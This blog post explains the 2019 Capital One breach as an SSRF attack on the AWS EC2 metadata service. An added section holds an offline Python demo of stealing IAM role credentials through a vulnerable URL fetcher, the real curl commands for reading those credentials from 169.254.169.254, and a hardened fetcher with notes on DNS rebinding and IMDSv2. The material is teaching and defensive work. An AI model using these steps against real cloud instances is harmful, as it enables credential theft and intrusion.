SSRF attack on AWS: Replaying Capital One hack for stealing EC2 metadata

Anunay Bhatt
5 min read · Aug 17, 2019

Unless you have been hiding in a cave or are not even remotely security-minded, you will have heard the news about the Capital One hack. It was possibly a Server-Side Request Forgery (SSRF) attack against an AWS-hosted application server, carried out by an ex-Amazon employee, Paige Thompson.

SSRF is an application-layer attack in which an attacker abuses functionality on an application server to make that server issue requests on the attacker's behalf, reading or updating internal resources that are not reachable from the outside. According to the federal complaint in the Capital One case, the internal resource reached was the EC2 instance metadata service, from which the attacker obtained the security credentials of the IAM role attached to the virtual machine.

“The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform.” [2]

Many have raised questions about Amazon's responsibility to mitigate SSRF attacks, since stealing EC2 metadata this way was a previously known attack vector. I will let you be the judge of that; in this article I want to demonstrate how to perform an SSRF attack against your own test AWS infrastructure in order to remotely retrieve the metadata stored on the EC2 instance, and further…
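To make the attack path concrete before touching real infrastructure, here is an added example (written for this edit, not code from the original article or from Capital One's systems). It models the SSRF sink as a "fetch this URL for me" function, stands in for the metadata service at 169.254.169.254 with an in-process fake so it runs offline, walks the two requests an attacker actually makes (list the role names, then fetch that role's credentials), and shows the target check that stops the request from ever reaching the metadata service. The role name, credential values and fetcher function names are constructed for the demo.

```python
"""
Added SSRF-to-IMDS demo (not from the original article).

- vulnerable_fetch: the SSRF sink, fetches any URL the client supplies.
- steal_role_credentials: what the attacker does through that sink.
- hardened_fetch: same feature, but refuses internal/link-local targets.
The metadata service is faked in-process so the script runs offline.
"""
import ipaddress
import json
import socket
from urllib.parse import urlparse

IMDS_HOST = "169.254.169.254"          # real EC2 metadata service address
ROLE_NAME = "demo-ec2-role"            # assumed role name for the demo

# Constructed stand-in for the metadata service: path -> response body.
# Real IMDS returns the attached role name at the first path and a JSON
# credential document at the second; the values here are placeholders.
FAKE_IMDS = {
    "/latest/meta-data/iam/security-credentials/": ROLE_NAME,
    f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLE0000000",
        "SecretAccessKey": "exampleSecretKeyNotReal",
        "Token": "exampleSessionTokenNotReal",
        "Expiration": "2019-08-17T12:00:00Z",
    }),
}


def fake_http_get(url: str) -> str:
    """Stand-in for requests.get(url).text so the demo needs no network."""
    u = urlparse(url)
    if u.hostname == IMDS_HOST:
        return FAKE_IMDS.get(u.path, "404 Not Found")
    return f"<html>fetched {url}</html>"


def vulnerable_fetch(user_url: str) -> str:
    """The SSRF sink: no validation, the server fetches whatever it is told."""
    return fake_http_get(user_url)


def steal_role_credentials(fetch) -> dict:
    """Attacker's two-step read through an SSRF: role name, then its keys."""
    base = f"http://{IMDS_HOST}/latest/meta-data/iam/security-credentials/"
    role = fetch(base).strip()
    return json.loads(fetch(base + role))


class BlockedTarget(Exception):
    """Raised when a requested URL points at a non-public destination."""


def is_internal(host: str) -> bool:
    """True if any address the host resolves to is link-local, private,
    loopback, reserved or multicast. Resolution failure fails closed."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if (addr.is_link_local or addr.is_private or addr.is_loopback
                or addr.is_reserved or addr.is_multicast):
            return True
    return False


def hardened_fetch(user_url: str) -> str:
    """Same feature as vulnerable_fetch, but only http(s) to public hosts."""
    u = urlparse(user_url)
    if u.scheme not in ("http", "https") or not u.hostname:
        raise BlockedTarget("only http(s) URLs with a host are allowed")
    if is_internal(u.hostname):
        raise BlockedTarget(f"refusing to fetch internal target {u.hostname}")
    return fake_http_get(user_url)


def is_blocked(user_url: str) -> bool:
    """Convenience wrapper: does the hardened fetcher reject this URL?"""
    try:
        hardened_fetch(user_url)
        return False
    except BlockedTarget:
        return True


if __name__ == "__main__":
    creds = steal_role_credentials(vulnerable_fetch)
    print("via vulnerable sink, got AccessKeyId:", creds["AccessKeyId"])
    print("hardened sink blocks IMDS:",
          is_blocked(f"http://{IMDS_HOST}/latest/meta-data/"))
```

Against a real instance the same two reads are `curl http://169.254.169.254/latest/meta-data/iam/security-credentials/` followed by the same URL with the returned role name appended; the SSRF simply makes the application server run those fetches for you. Two caveats on the defence: `is_internal` resolves the hostname at check time, so a fetcher that resolves again at request time is still exposed to DNS rebinding unless it pins the checked address, and the check does nothing about attacker-controlled redirects from a public host back to 169.254.169.254, which the fetcher must refuse to follow. Separately from application-side fixes, AWS later introduced IMDSv2 (November 2019, after this article), which requires a session token obtained with a PUT request and a custom header, something a plain GET-based SSRF cannot produce; instances that leave IMDSv1 enabled remain reachable exactly as shown here.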
